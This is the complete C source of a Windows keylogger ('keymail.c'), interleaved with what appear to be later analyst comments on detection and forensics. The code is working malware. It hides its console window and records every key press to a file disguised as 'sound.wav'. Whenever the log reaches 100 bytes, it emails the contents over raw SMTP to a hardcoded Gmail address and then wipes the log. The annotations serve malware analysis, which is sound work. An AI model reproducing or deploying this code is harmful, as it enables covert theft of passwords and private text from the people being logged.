1/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
2* *
3* File: keymail.c Ver. 0.7 *
4* *
5* Purpose: a stealth (somewhat) key logger, writes to a log file then sends *
6* an email to whoever is set in the #define options at compile time. *
7* This code is for educational uses, don't be an ass hat with it. *
8* White Scorpion (www.white-scorpion.nl) did the initial work on the key *
9* logger, but he has gone on to bigger and better things. *
10* This version was crafted by Irongeek (www.Irongeek.com), who tacked on *
11* some code to make it send emails, along with a few other changes. *
12* If some of the code is crappy, blame Irongeek and not White Scorpion. *
13* Please send Irongeek improvements and he will post the changes and give you *
14* credit for your contributions. *
15* *
16* This program is free software; you can redistribute it and/or *
17* modify it under the terms of the GNU General Public License *
18* as published by the Free Software Foundation; either version 2 *
19* of the License, or (at your option) any later version. *
20* *
21* This program is distributed in the hope that it will be useful, *
22* but WITHOUT ANY WARRANTY; without even the implied warranty of *
23* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
24* GNU General Public License for more details. *
25* *
26* You should have received a copy of the GNU General Public License *
27* along with this program; if not, write to the Free Software *
28* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. *
29* *
30* Change log: *
31* 1/3/06 On Ed Rguyl's recommendation I changed how malloc was used. *
32* 6/22/06 Added the date and time functionality using ctime and fixed *
33* a bug where subject was being defined twice.(ThVoidedLine) *
34* *
35* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
36/*
37Compile notes: I used Dev-C++ 4.9.9.2 to compile this. If you get an error like:
38 [Linker error] undefined reference to `WSAStartup@8'
39Add this:
40 -lws2_32
41to Tools->Compiler Options under the section on compile flags.
42*/
43
44#include <windows.h>
45#include <stdio.h>
46#include <winuser.h>
47#include <windowsx.h>
48#include <time.h>
/* Forward declaration of the SMTP sender defined at the end of this listing. */
49int MailIt (char *mailserver, char *emailto, char *emailfrom,
50char *emailsubject, char *emailmessage);
/* BUFSIZE is not referenced by any function shown in this listing. */
51#define BUFSIZE 800
/* Passed to sleep() between the SMTP steps in MailIt. */
52#define waittime 500
53/*If you don't know the mail exchange server for an address for the following
54"nslookup -querytype=mx gmail.com" but replace gmail.com with the domain for
55whatever email address you want. YOU MUST CHANGE THESE SETTINGS OR
56IT WILL NOT WORK!!! */
/*
 * Compile-time delivery settings (server, recipient, sender). They are plain
 * string literals, so for analysis they would normally be recoverable from a
 * built sample with simple string extraction -- TODO confirm per build.
 */
57#define cmailserver "gmail-smtp-in.l.google.com"
58#define cemailto "irong33k@gmail.com"
59#define cemailfrom "irong33k@gmail.com"
/* Log size in bytes (as reported by ftell) at which get_keys calls MailIt. */
60#define LogLength 100
/*
 * FileName is the keystroke log and SMTPLog is the SMTP transcript. Both are
 * opened by bare relative name and are written with fputs/fputc text, so the
 * .wav extension does not match the content; a "wav" file with no audio
 * header that a process appends to repeatedly is a useful hunting signal.
 */
61#define FileName "sound.wav"
62#define SMTPLog "ring.wav"
/* Fixed subject line placed in every message built by MailIt. */
63#define cemailsubject "Logged"
64
/* test_key is declared here but is neither defined nor called in this listing. */
65int test_key(void);
/*
 * Entry point. As shown it does three things in order:
 *   1. allocates a console and hides its window,
 *   2. appends a "Started logging" line with the current time to FileName,
 *   3. calls get_keys() and returns its result as the process exit code.
 *
 * Analysis notes: the hide sequence below is active in this listing even
 * though the original comment says "uncomment". A process that calls
 * AllocConsole, looks up its own "ConsoleWindowClass" window and immediately
 * passes it to ShowWindow with 0 (SW_HIDE) ends up with no visible window,
 * which is worth correlating with the keyboard polling done in get_keys().
 * get_keys is called here before any declaration of it appears in the file.
 */
66int main(void)
67{
68 //Uncomment the lines below to put the keylogger in stealth mode.
69 HWND stealth; /*creating stealth */
70 AllocConsole();
71 stealth=FindWindowA("ConsoleWindowClass",NULL);
 /* second argument 0 is SW_HIDE */
72 ShowWindow(stealth,0);
73
 /* Session marker: each start appends "\nStarted logging: " followed by the
    ctime() text to the log, so a recovered log shows one line per launch. */
74 {FILE *file;
75 file=fopen(FileName,"a+");
76 time_t theTime=time(0);
77 fputs("\nStarted logging: ", file);
78 fputs(ctime(&theTime),file);
79 fclose(file);
80 }
81
 /* The block below is commented out. It refers to `test`, `create` and
    create_key(), none of which are defined anywhere in this listing. */
82 /* if (test==2)
83 {//the path in which the file needs to be
84 char *path="c:\\%windir%\\svchost.exe";
85 create=create_key(path);
86 } */
87
 /* get_keys() loops forever unless opening the log for append fails. */
88 int t=get_keys();
89 return t;
90}
91
/*
 * Main capture loop. Each pass of the outer while(1):
 *   - sleeps, then sweeps virtual-key codes 8..222 with GetAsyncKeyState;
 *   - for a code whose state equals -32767 (0x8001 as a SHORT: key down and
 *     pressed since the previous call), opens FileName for append, writes a
 *     representation of the key and closes the file again;
 *   - after the sweep, reopens FileName, measures it, and once it holds at
 *     least LogLength bytes passes the whole content to MailIt() and then
 *     truncates the log by reopening it with "w".
 *
 * Returns 1 if the append-mode fopen fails; the EXIT_SUCCESS return after the
 * loop is not reached because the loop has no exit condition.
 *
 * Analysis notes:
 *   - Behaviour to look for: one process polling GetAsyncKeyState across
 *     almost the whole virtual-key range on a short timer, with an
 *     open/append/close of the same file per key press, followed by an
 *     outbound mail connection whenever that file reaches LogLength bytes.
 *   - Reading a recovered log: letters are always stored lower-case (codes
 *     65..90 have 32 added); SHIFT and CAPS LOCK appear only as separate
 *     bracketed markers. Codes 39..64 are written as the byte with the same
 *     value, which is correct for the digit keys (48..57) but means other
 *     keys in that range show up as punctuation; VK_DELETE is 46, so Delete is
 *     written as '.' by that branch and the VK_DELETE case below is not
 *     reached.
 *   - Because the log is emptied after every MailIt call, the file on disk
 *     normally holds only the most recent keystrokes.
 */
92int get_keys(void)
93{
94int freadindex;
95char *buf;
96long len;
97FILE *file;
 /* Opened once at entry; the loop below declares its own block-scoped
    `file` variables and does not use this handle. */
98file=fopen(FileName,"a+");
99
100
101 short character;
102 while(1)
103 {
 /* Units depend on which sleep() the toolchain resolves -- TODO confirm. */
104 sleep(10);/*to prevent 100% cpu usage*/
105 for(character=8;character<=222;character++)
106 {
107 if(GetAsyncKeyState(character)==-32767)
108 {
109 FILE *file;
110 file=fopen(FileName,"a+");
111 if(file==NULL)
112 {
113 return 1;
114 }
115 if(file!=NULL)
116 {
 /* In the two range branches `break` leaves the for-loop, ending this
    sweep; inside the switch further down `break` only leaves the switch. */
117 if((character>=39)&&(character<=64))
118 {
119 fputc(character,file);
120 fclose(file);
121 break;
122 }
123 else if((character>64)&&(character<91))
124 {
 /* 'A'..'Z' key codes become 'a'..'z' regardless of shift state */
125 character+=32;
126 fputc(character,file);
127 fclose(file);
128 break;
129 }
130 else
131 {
 /* Named keys are written as bracketed markers on their own line;
    every case closes the file it opened above. */
132 switch(character)
133 {
134 case VK_SPACE:
135 fputc(' ',file);
136 fclose(file);
137 break;
138 case VK_SHIFT:
139 fputs("\r\n[SHIFT]\r\n",file);
140 fclose(file);
141 break;
142 case VK_RETURN:
143 fputs("\r\n[ENTER]\r\n",file);
144 fclose(file);
145 break;
146 case VK_BACK:
147 fputs("\r\n[BACKSPACE]\r\n",file);
148 fclose(file);
149 break;
150 case VK_TAB:
151 fputs("\r\n[TAB]\r\n",file);
152 fclose(file);
153 break;
154 case VK_CONTROL:
155 fputs("\r\n[CTRL]\r\n",file);
156 fclose(file);
157 break;
158 case VK_DELETE:
159 fputs("\r\n[DEL]\r\n",file);
160 fclose(file);
161 break;
162 case VK_OEM_1:
163 fputs("\r\n[;:]\r\n",file);
164 fclose(file);
165 break;
166 case VK_OEM_2:
167 fputs("\r\n[/?]\r\n",file);
168 fclose(file);
169 break;
170 case VK_OEM_3:
171 fputs("\r\n[`~]\r\n",file);
172 fclose(file);
173 break;
174 case VK_OEM_4:
175 fputs("\r\n[ [{ ]\r\n",file);
176 fclose(file);
177 break;
178 case VK_OEM_5:
179 fputs("\r\n[\\|]\r\n",file);
180 fclose(file);
181 break;
182 case VK_OEM_6:
183 fputs("\r\n[ ]} ]\r\n",file);
184 fclose(file);
185 break;
186 case VK_OEM_7:
187 fputs("\r\n['\"]\r\n",file);
188 fclose(file);
189 break;
 /* 187..190 are VK_OEM_PLUS, VK_OEM_COMMA, VK_OEM_MINUS, VK_OEM_PERIOD */
190 case 187:
191 fputc('+',file);
192 fclose(file);
193 break;
194 case 188:
195 fputc(',',file);
196 fclose(file);
197 break;
198 case 189:
199 fputc('-',file);
200 fclose(file);
201 break;
202 case 190:
203 fputc('.',file);
204 fclose(file);
205 break;
206 case VK_NUMPAD0:
207 fputc('0',file);
208 fclose(file);
209 break;
210 case VK_NUMPAD1:
211 fputc('1',file);
212 fclose(file);
213 break;
214 case VK_NUMPAD2:
215 fputc('2',file);
216 fclose(file);
217 break;
218 case VK_NUMPAD3:
219 fputc('3',file);
220 fclose(file);
221 break;
222 case VK_NUMPAD4:
223 fputc('4',file);
224 fclose(file);
225 break;
226 case VK_NUMPAD5:
227 fputc('5',file);
228 fclose(file);
229 break;
230 case VK_NUMPAD6:
231 fputc('6',file);
232 fclose(file);
233 break;
234 case VK_NUMPAD7:
235 fputc('7',file);
236 fclose(file);
237 break;
238 case VK_NUMPAD8:
239 fputc('8',file);
240 fclose(file);
241 break;
242 case VK_NUMPAD9:
243 fputc('9',file);
244 fclose(file);
245 break;
246 case VK_CAPITAL:
247 fputs("\r\n[CAPS LOCK]\r\n",file);
248 fclose(file);
249 break;
250 default:
251 fclose(file);
252 break;
253 }
254 }
255 }
256 }
257 }
 /* Size check after every sweep: the log length decides when the content
    leaves the host, so the send is driven by typing volume, not by a timer. */
258 FILE *file;
259 file=fopen(FileName,"rb");
260 fseek(file,0,SEEK_END); //go to end
261 len=ftell(file); //get position at end (length)
262 if(len>=LogLength) {
263 fseek(file,0,SEEK_SET);//go to beg.
264 buf=(char *)malloc(len);//malloc buffer
265 freadindex=fread(buf,1,len,file);//read into buffer
266 buf[freadindex] = '\0';//Extra bit I have to add to make it a string
 /* whole log content becomes the message body */
267 MailIt( cmailserver, cemailto, cemailfrom, cemailsubject, buf);
268 fclose(file);
 /* reopening with "w" empties the log after the send attempt */
269 file=fopen(FileName,"w");
270 }
271
272 fclose(file);
273 //free (buf);
274
275 }
276 return EXIT_SUCCESS;
277}
278
/*
 * Sends one message by speaking SMTP directly to `mailserver` on TCP port 25.
 *
 * Parameters: mailserver is resolved with gethostbyname(); emailto and
 * emailfrom are used both in the envelope (RCPT TO / MAIL FROM) and in the
 * To:/From: header lines; emailsubject and emailmessage follow in the DATA
 * section.
 *
 * Sequence: WSAStartup(0x202, i.e. Winsock 2.2) -> resolve -> connect ->
 * read greeting -> "helo" -> "MAIL FROM" -> "RCPT TO" -> "DATA" -> headers
 * and body terminated by "\r\n.\r\n" -> "quit". After each step the function
 * sleeps `waittime`, reads up to `bufsize` bytes of reply and appends both
 * the sent line and the reply to SMTPLog.
 *
 * Returns -1 if WSAStartup fails. If name resolution, socket creation or the
 * connect fails it calls exit(1), which ends the whole process. No value is
 * returned on the normal path.
 *
 * Analysis notes:
 *   - Network: an endpoint opening its own connection to an external mail
 *     exchanger on port 25, rather than going through the organisation's mail
 *     relay, is unusual for a workstation and is commonly blocked at egress.
 *     No STARTTLS or authentication command is sent, so the whole exchange,
 *     including the captured text, is readable on the wire; the greeting
 *     "helo me.somepalace.com" is a fixed string.
 *   - Host: SMTPLog accumulates a full transcript of every session (commands,
 *     message content and server replies) and is never truncated here, so it
 *     is a richer forensic artefact than the keystroke log itself.
 *   - Because a failed resolve or connect ends the process, blocking this
 *     traffic also stops the capture loop at its first delivery attempt.
 */
279int MailIt (char *mailserver, char *emailto, char *emailfrom,
280char *emailsubject, char *emailmessage) {
281 SOCKET sockfd;
282 WSADATA wsaData;
283 FILE *smtpfile;
284
 /* size of each recv() below; Rec_Buf has one extra byte for the terminator */
285 #define bufsize 300
286 int bytes_sent; /* Sock FD */
287 int err;
288 struct hostent *host; /* info from gethostbyname */
289 struct sockaddr_in dest_addr; /* Host Address */
290 char line[1000];
291 char *Rec_Buf = (char*) malloc(bufsize+1);
292 smtpfile=fopen(SMTPLog,"a+");
293 if (WSAStartup(0x202,&wsaData) == SOCKET_ERROR) {
294 fputs("WSAStartup failed",smtpfile);
295 WSACleanup();
296 return -1;
297 }
298 if ( (host=gethostbyname(mailserver)) == NULL) {
299 perror("gethostbyname");
300 exit(1);
301 }
302 memset(&dest_addr,0,sizeof(dest_addr));
303 memcpy(&(dest_addr.sin_addr),host->h_addr,host->h_length);
304
305 /* Prepare dest_addr */
306 dest_addr.sin_family= host->h_addrtype; /* AF_INET from gethostbyname */
 /* the port is the literal 25; no PORT macro exists in this listing */
307 dest_addr.sin_port= htons(25); /* PORT defined above */
308
309 /* Get socket */
310
311 if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
312 perror("socket");
313 exit(1);
314 }
315 /* Connect !*/
316 fputs("Connecting....\n",smtpfile);
317
318 if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
319 perror("connect");
320 exit(1);
321 }
 /* server greeting */
322 sleep(waittime);
323 err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
324 fputs(Rec_Buf,smtpfile);
 /* greeting command with a fixed host name */
325 strcpy(line,"helo me.somepalace.com\n");
326 fputs(line,smtpfile);
327 bytes_sent=send(sockfd,line,strlen(line),0);
328 sleep(waittime);
329 err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
330 fputs(Rec_Buf,smtpfile);
 /* envelope sender */
331 strcpy(line,"MAIL FROM:<");
332 strncat(line,emailfrom,strlen(emailfrom));
333 strncat(line,">\n",3);
334 fputs(line,smtpfile);
335 bytes_sent=send(sockfd,line,strlen(line),0);
336 sleep(waittime);
337 err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
338 fputs(Rec_Buf,smtpfile);
 /* envelope recipient */
339 strcpy(line,"RCPT TO:<");
340 strncat(line,emailto,strlen(emailto));
341 strncat(line,">\n",3);
342 fputs(line,smtpfile);
343 bytes_sent=send(sockfd,line,strlen(line),0);
344 sleep(waittime);
345 err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
346 fputs(Rec_Buf,smtpfile);
347 strcpy(line,"DATA\n");
348 fputs(line,smtpfile);
349 bytes_sent=send(sockfd,line,strlen(line),0);
350 sleep(waittime);
351 err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
352 fputs(Rec_Buf,smtpfile);
353 sleep(waittime);
 /* Headers and body are assembled in `line` and sent as one buffer; the
    same text is written to SMTPLog first, so the transcript file contains
    a copy of every message body. */
354 strcpy(line,"To:");
355 strcat(line,emailto);
356 strcat(line,"\n");
357 strcat(line,"From:");
358 strcat(line,emailfrom);
359 strcat(line,"\n");
360 strcat(line,"Subject:");
361 strcat(line,emailsubject);
362 strcat(line,"\n");
363 strcat(line,emailmessage);
364 strcat(line,"\r\n.\r\n");
365 fputs(line,smtpfile);
366 bytes_sent=send(sockfd,line,strlen(line),0);
367 sleep(waittime);
368 err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
369 fputs(Rec_Buf,smtpfile);
370 strcpy(line,"quit\n");
371 fputs(line,smtpfile);
372 bytes_sent=send(sockfd,line,strlen(line),0);
373 sleep(waittime);
374 err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
375 fputs(Rec_Buf,smtpfile);
376 fclose(smtpfile);
377 #ifdef WIN32
378 closesocket(sockfd);
379 WSACleanup();
380 #else
381 close(sockfd);
382 #endif
383}